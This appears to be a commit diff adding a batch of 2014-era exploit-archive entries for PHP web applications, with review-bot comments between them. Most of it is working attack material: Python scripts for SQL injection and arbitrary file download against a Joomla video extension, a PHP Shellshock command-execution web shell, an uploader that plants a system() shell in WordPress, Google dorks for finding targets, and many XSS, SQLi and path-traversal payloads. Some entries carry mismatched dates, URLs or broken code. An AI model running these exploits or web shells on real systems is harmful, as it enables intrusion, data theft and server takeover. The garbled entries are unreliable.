at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the patch for v3.0
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
==============
Bilgi Güvenli?i Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
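Review bot: The disclosure timeline is internally inconsistent: `20 Nov 2014 : Vendor Response` falls after both the release date `13 Nov 2014` and `13 Nov 2014 : Public Disclosure`, and `June 26, 2014 : Patch Released` predates `20 Oct 2014 : Contact with Vendor`; the dates need checking and listing in chronological order. The title `Proticaret E-Commerce Script v3.0 >= SQL Injection` reads as "version 3.0 and later", which contradicts `Apply the patch for v3.0`; if earlier versions are meant, `<= v3.0` is the intended operator. The technical section consists of the two words `SQL Injection`; the request and response show that the injectable point is the `Code` element of the `GetProductCodes` SOAP operation and that the unhandled `SqlException` echoes query results back in the SOAP fault, so stating that, and that the fix should bind the parameter and stop returning detailed faults, would give the section content. Several characters in the vendor and credits lines (`?leti?im`, `Güvenli?i`) were lost to an encoding error when the file was stored.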


@ -0,0 +1,198 @@
#!/usr/bin/python
#
# Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc:
# http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
# http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
# sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
# sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \
|___| | _ | _ | | | _ | |. 1 |. | \
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 Sql Injection
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
checkext = 0
evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }
char = "%2CNULL"
endurl = "%2CNULL%23"
bar = "#"
print(banner)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
try:
req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
checkext += 1
else:
checkext += 0
if checkext > 0:
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
else:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
sys.exit(1)
except urllib2.HTTPError:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
sys.exit(1)
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
print("")
sys.stdout.write("\r[+] Checking Version: ")
try:
req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
sys.stdout.write("\r[+] Checking Version: "+str(VER))
except urllib2.HTTPError:
sys.stdout.write("\r[+] Checking Version: Unknown")
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
print("")
for exploiting, dork in evilurl.iteritems():
s = ""
barcount = ""
for a in range(1,100):
s += char
try:
req = urllib2.Request(host+exploiting+s+endurl, None, headers)
response = urllib2.urlopen(req).read()
if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)
except urllib2.HTTPError as e:
response = e.read()
if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)
except urllib2.URLError as e:
print("\n[X] Connection Error: "+str(e.code))
sys.exit(1)
barcount += bar
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
sys.stdout.flush()
print "\n[X] Not vulnerable :("
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"


@ -0,0 +1,21 @@
# Exploit Title: clientResponse Client Management XSS Vulnerability
# Date: 14-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v4.1
# Vendor Homepage:
http://codecanyon.net/item/clientresponse-responsive-php-client-management/3797780
# Tested on: Chrome & Iceweasel
# Vulnerability Description:
===Stored XSS===
The message system of script is not secure. You can run XSS payloads on
"Subject" and "Message" inputs. If you use "Subject" input for attack and
send the message to admin when admin login the system it will be directly
affect by vulnerability. Also profile section inputs are vulnerable.
Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
=Solution=
Filter the input fields against to XSS attacks.
================

35
platforms/php/webapps/35146.txt Executable file

@ -0,0 +1,35 @@
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @
mail.c:283
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the user may only alter environment variables
whose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variables
that
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
empty,
// PHP will let the user modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually
send any mail
}
else return "Not vuln (not bash)";
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>
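Review bot: The value returned by `shellshock($_REQUEST["cmd"]);` on the last line is discarded, so neither the captured output nor the "Not vuln" / "No output" strings ever reach the HTTP response; `echo shellshock($_REQUEST["cmd"]);` is presumably what was intended. Several `//` comments are wrapped onto continuation lines that carry no comment marker (`mail.c:283` after the function header, `whose names`, `that`, `empty,` in the Safe Mode block, and `send any mail` after the `mail()` call); if that wrapping is in the committed file rather than a rendering artifact, the script does not parse. The `strstr(...) != FALSE` test relies on loose comparison; `strstr(readlink("/bin/sh"), "bash") !== false` is the conventional form.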

80
platforms/php/webapps/35159.txt Executable file

@ -0,0 +1,80 @@
Advisory ID: 92152
Product: MODX Revolution
Vendor: MODX
Vulnerable Version(s): 2.0.0?2.2.14
Tested Version: 2.2.14
Advisory Publication: 16 July, 2014 [without technical details]
Vendor Notification: 16 July, 2014
Vendor Patch: 15 July, 2014
Public Disclosure: 2 November , 2014
Vulnerability Type: CSRF Tokens Bypass + Reflected Cross Site Scripting + Stored XSS
CVE Reference: Requested
Risk Level: Critical
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
Patch - Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
Reported By - Narendra Bhati ( R00t Sh3ll)
Security Analyst @ Suma Soft Pvt. Ltd. , Pune ( India )IT Risk & Security Management Services , Pune ( India)
Facebook - https://facebook.com/narendradewsoft
twitter - https://www.twitter.com/NarendraBhatiNB
Blog - http://hacktivity.websecgeeks.com
Email - bhati.contact@gmail.com
-----------------------------------------------------------------------------------------------
Advisory Details:
Narendra Bhati discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks & Along With Bypassing CSRF Tokens Protection ,Its allow an attacker to perform A CSRF Attack alosing With XSS to take over victim account by changin promary email address , Sending forged request Etc , Tricking an admin to attack on their own users by sending specially crafter malicous payload as CSRF Attack
1) Cross Site Request Forgery Protection (CSRF) Tokens Bypassing in Modx Revolution
The vulnerability exists due to insufficient validation of csrftokens ["HTTP_MODHAUTH] at server side which allow an attacker to Perform CSRF Attack by bypassing CSRF Protection Mechanism To take over victim account , Trick him to send malicious request Etc.
------------------------------------------------------------------------------------
2) Reflected Cross-Site Scripting (XSS) in MODX Revolution
The vulnerability exists due to insufficient sanitization of input data passed via the "context_key" HTTP GET parameter to "http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key=" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
This vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
The exploitation example below uses the ""></script><img src=x onerror=prompt(/XSS/)>" JavaScript function to display "/XSS/" word:
Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key="></script><img src=x onerror=prompt(/XSS/)>
Vulnerable Parameter - "context_key"
XSS Payload - "></script><img src=x onerror=prompt(/XSS/)>
"></script><img src=x onerror=prompt(document.cookie)>
-----------------------------------------------------------------------------------------------
3) Stored Cross-Site Scripting (XSS) in MODX Revolution
The vulnerability exists due to insufficient sanitization of input data passed via the "context" HTTP POST parameter to " http://127.0.0.1/day/modx/manager/index.php?id=1" URL. A local attacker [Authenticated User] can execute arbitrary HTML and script code in browser in context of the vulnerable website.
This vulnerability can be used against website visitors to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
The exploitation example below uses the "<script>alert(1)</script>" JavaScript function to display "1" word:
Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?id=1
Vulnerable Parameter - "context"
XSS Payload - <script>alert(1)</script>
Note - This Stored XSS Was more critical because there was a CSRF protection vulnerability also , which allow an attacker to trick an administrator To Send Unwated Request for Stored XSS , which will directly attack to the Visitors ,
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
More Information:
Public Advisory By Vendor :- http://forums.modx.com/thread/92152/critical-login-xss-csrf-revolution-2-2-1-4-and-prior
Public Disclosure With Tecnical Details - http://hacktivity.websecgeeks.com/modx-csrf-and-xss/
-----------------------------------------------------------------------------------------------
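Review bot: The affected range at `Vulnerable Version(s): 2.0.0?2.2.14` has a `?` where a dash belongs, which looks like a mis-encoded character from the original submission; the line should read `Vulnerable Version(s): 2.0.0 - 2.2.14` so the range is unambiguous. The header also carries two different attributions (`Discovered and Provided: High-Tech Bridge Security Research Lab` and `Reported By - Narendra Bhati`), which a reader cannot reconcile from the text alone.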

43
platforms/php/webapps/35193.txt Executable file

@ -0,0 +1,43 @@
# Exploit Title: VLD Personal Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version 2.7.1
# Tested on: Windows / Linux
XSS Attack
Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
Response :
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1)) was submitted in the country parameter.
Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
>&gender2=2&type_id=members
>&country=
>1%20and%20benchmark(20000000%2csha1(1))%20
--
Talib Osmani

196
platforms/php/webapps/35246.py Executable file

@ -0,0 +1,196 @@
#!/usr/bin/env python
#
# Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info:
# Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
# The variable "f" is not sanitized.
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/QvBTKFLBQ20
#
#
# Http connection
import urllib, urllib2
# String manipulation
import re
# Time management
import time
# Args management
import optparse
# Error management
import sys
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \\
|___| | _ | _ | | | _ | |. 1 |. | \\
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def checkcomponent(url,headers):
try:
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
print("")
except urllib2.HTTPError:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
sys.exit(1)
except urllib2.URLError:
print '[X] Connection Error'
def checkversion(url,headers):
try:
req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
response = urllib2.urlopen(req).readlines()
for line_version in response:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
sys.stdout.write("\r[+] Checking Version: "+str(VER))
print("")
except urllib2.HTTPError:
sys.stdout.write("\r[+] Checking Version: Unknown")
except urllib2.URLError:
print("\n[X] Connection Error")
sys.exit(1)
def connection(url,headers,pathtrav):
char = "../"
bar = "#"
s = ""
barcount = ""
for a in range(1,20):
s += char
barcount += bar
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
sys.stdout.flush()
try:
req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
response = urllib2.urlopen(req)
content = response.read()
if content != "" and not "failed to open stream" in content:
print("\n[!] VULNERABLE")
print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
print("")
print("[+] Do you want [D]ownload or [R]ead the file?")
print("[+]")
sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
download = set(['d'])
read = set(['r'])
while True:
choice = raw_input().lower()
if choice in download:
filedown = pathtrav.split('/')[-1]
urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
print("[!] DOWNLOADED!")
print("[!] Check file: "+filedown)
return True
elif choice in read:
print("")
print content
return True
else:
sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
except urllib2.HTTPError:
#print '[X] HTTP Error'
pass
except urllib2.URLError:
print '\n[X] Connection Error'
time.sleep(1)
print("\n[X] File not found or fixed component :(")
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file to check",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = options.file
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)
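Review bot: `checkcomponent` builds a `urllib2.Request` for `download.php` but never opens it, so no request is sent, `urllib2.HTTPError` can never be raised, and the function reports FOUND for every target; `checkversion` shows the intended shape, and the line after the `Request` should be `urllib2.urlopen(req)`. Its `URLError` handler also only prints and falls through to the version check, unlike the `sys.exit(1)` used in `checkversion`, and `connection` likewise prints a connection error on each of its 19 iterations instead of stopping. A module docstring or header comment stating that the script is Python 2 only (`urllib2`, `raw_input`, print statements) would save the next reader a failed run.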


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45976/info
web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
web@all 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45983/info
PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PivotX 2.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45984/info
The Uploader Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Uploader 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/uploader/views/notify.php?num=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45990/info
The WordPress Videox7 UGC Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Videox7 UGC 2.5.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45991/info
The Audio plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Audio plugin 0.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/audio/getid3/demos/demo.browse.php?showfile=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45996/info
PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PivotX 2.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/includes/blogroll.php?id=1&color=123;}</style><script>alert("XSS");</script>|


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45996/info
PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PivotX 2.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/includes/timwrapper.php?src=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45997/info
The RSS Feed Reader WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RSS Feed Reader WordPress Plugin 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/rss-feed-reader/magpie/scripts/magpie_slashbox.php?rss_url=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45998/info
The WP Featured Post with Thumbnail Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Featured Post with Thumbnail Plugin 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-featured-post-with-thumbnail/scripts/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46000/info
The WP Publication Archive Plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attacker can exploit this issue to download arbitrary files from the affected application. This may allow the attacker to obtain sensitive information; other attacks are also possible.
WP Publication Archive 2.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46001/info
The Featured Content plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Featured Content 0.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss]
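Review bot: The PoC URL on the last line of this entry is the same `x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss]` path used for the Videox7 UGC entry (BID 45990) earlier in this commit, while the text describes the Featured Content 0.0.1 plugin; this looks like a copy-paste error. The line should reference the Featured Content plugin path given in the BID 46001 source, otherwise the entry cannot be used to confirm whether that plugin is affected or fixed.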

60
platforms/php/webapps/35265.php Executable file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/46002/info
WordPress Recip.ly is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
WordPress Recip.ly 1.1.7 and prior versions are vulnerable.
import socket
host = &#039;localhost&#039;
path = &#039;/wordpress&#039;
shell_path = path + &#039;/wp-content/plugins/reciply/images/shell.php&#039;
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(&#039;POST &#039; + path + &#039;/wp-content/plugins/reciply/uploadImage.php HTTP/1.1\r\n&#039;
&#039;Host: localhost\r\n&#039;
&#039;Proxy-Connection: keep-alive\r\n&#039;
&#039;User-Agent: x\r\n&#039;
&#039;Content-Length: 195\r\n&#039;
&#039;Cache-Control: max-age=0\r\n&#039;
&#039;Origin: null\r\n&#039;
&#039;Content-Type: multipart/form-data; boundary=----x\r\n&#039;
&#039;Accept: text/html\r\n&#039;
&#039;Accept-Encoding: gzip,deflate,sdch\r\n&#039;
&#039;Accept-Language: en-US,en;q=0.8\r\n&#039;
&#039;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n&#039;
&#039;\r\n&#039;
&#039;------x\r\n&#039;
&#039;Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n&#039;
&#039;Content-Type: application/octet-stream\r\n&#039;
&#039;\r\n&#039;
&#039;<?php echo \&#039;<pre>\&#039; + system($_GET[\&#039;CMD\&#039;]) + \&#039;</pre>\&#039;; ?>\r\n&#039;
&#039;------x--\r\n&#039;
&#039;\r\n&#039;)
resp = s.recv(8192)
http_ok = &#039;HTTP/1.1 200 OK&#039;
if http_ok not in resp[:len(http_ok)]:
print &#039;error uploading shell&#039;
return
else: print &#039;shell uploaded&#039;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(&#039;GET &#039; + shell_path + &#039; HTTP/1.1\r\n&#039;\
&#039;Host: &#039; + host + &#039;\r\n\r\n&#039;)
if http_ok not in s.recv(8192)[:len(http_ok)]: print &#039;shell not found&#039;
else: print &#039;shell located at http://&#039; + host + shell_path
upload_shell()
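Review bot: The body of this entry is Python, yet it is committed as `35265.php`, and every string quote has survived as the HTML entity `&#039;`, so the script cannot run as stored; the four advisory sentences above `import socket` are also plain prose rather than comments. If the entry is meant to be runnable it needs the entities decoded and the prose prefixed with `#`, otherwise it should be kept as a `.txt` advisory like the neighbouring BID entries. A header comment naming the source BID and the affected version (both present in the prose) would also survive that conversion.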

105
platforms/php/webapps/35266.txt Executable file

@ -0,0 +1,105 @@
*# Exploit Title*:[Stored XSS vulnerability in MyBB 1.8.2
*# Date:* 16th November'2014
*# Exploit Author:* Avinash Kumar Thapa
*# Vendor Homepage:* http://www.mybb.com/
*# Software Link*: http://www.mybb.com/download/
*# Version:* MyBB 1.8.2 (latest)
*# Tested on:*
* Operating System*: Windows 8.1
* Browser Used* : Mozilla Firefox 33.1 (localhost)
####################################################################################
The latest version of MyBB forums(1.8.2) is vulnerable to Stored Cross-Site
Scripting(XSS) vulnerability and Complete Proof of Concept is shown below:
*Stored XSS:*
*Step1: * Create a user account and go to *User CP >Edit Profile > **Custom
User Title*
*Vector Used : <img src=x onerror=alert('XSS');>*
*Post Request*
*POST /fuck/Upload/usercp.php HTTP/1.1*
*Host: localhost*
